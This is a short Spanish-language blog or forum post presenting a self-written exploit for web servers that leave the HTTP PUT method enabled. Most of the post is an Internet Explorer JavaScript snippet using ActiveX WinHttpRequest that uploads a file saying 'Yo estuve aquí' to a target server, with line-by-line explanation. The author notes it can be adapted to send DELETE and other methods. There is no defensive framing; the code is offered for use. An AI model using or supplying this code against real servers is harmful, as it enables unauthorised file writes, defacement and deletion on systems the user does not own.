VULNERABILIDADES HTTP (PUT)

Ultimamente apesar del avance de los updates y demás, muchos servidores webs tienen aún vulnerabilidades q muchas veces nace por parte del descuido del administrador mas que por otra cosa, una de esa vulnerabilidades es dejar habilitado otros métodos además del GET en nuestro servidor web, tal como el metodo PUT... estuve buscando hace poco un código exploit para dicha vulnerabilidad, sin embargo los que encontré no funcionó ninguno... por lo q me dí a la tarea de hacer el código yo, el cual expongo acontinuación y el cual se puede usar para trabajar otros métodos, como DELETE, GET, TRACE...... etc.

<script type="text/javascript">
function xxx()
{
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");

//inicializa el HTTP Request.
WinHttpReq.Open("PUT", "http://www.servidor.com/newdoc.txt", false);

//Sube el contenido del nuevo documento (newdoc).
WinHttpReq.Send("Hola mundo, Yo estuve aquí!!");

//Visualiza cualquier respuesta (q muchas veces es html) por parte del servidor
document.write(WinHttpReq.ResponseText);
}
</script>
<input type="button" onclick="xxx()" value="Subir Archivo" />

....

El código anterior sube el archivo newdoc.txt con el contenido Hola mundo....... al servidor con el método PUT activo. funciona con IE.

WinHttpReq.Open("PUT", "http://www.servidor.com/newdoc.txt", false);

Inicializa un http request con el método PUT, en lugar de dicho método se puede enviar DELETE, GET, OPTIONS, etc..., el segundo parametro es el servidor (URL), y por último le decimos si queremos que sea asíncrono (true) o síncrono, esto es si queremos que se envien los request sin esperar respuesta (asíncrono) o si queremos que espere un Response.

En caso del PUT el método send lleva como parámetro el contenido, en caso de otros métodos http, como el GET, send no lleva parámetros ( WinHttpReq.Send(); ).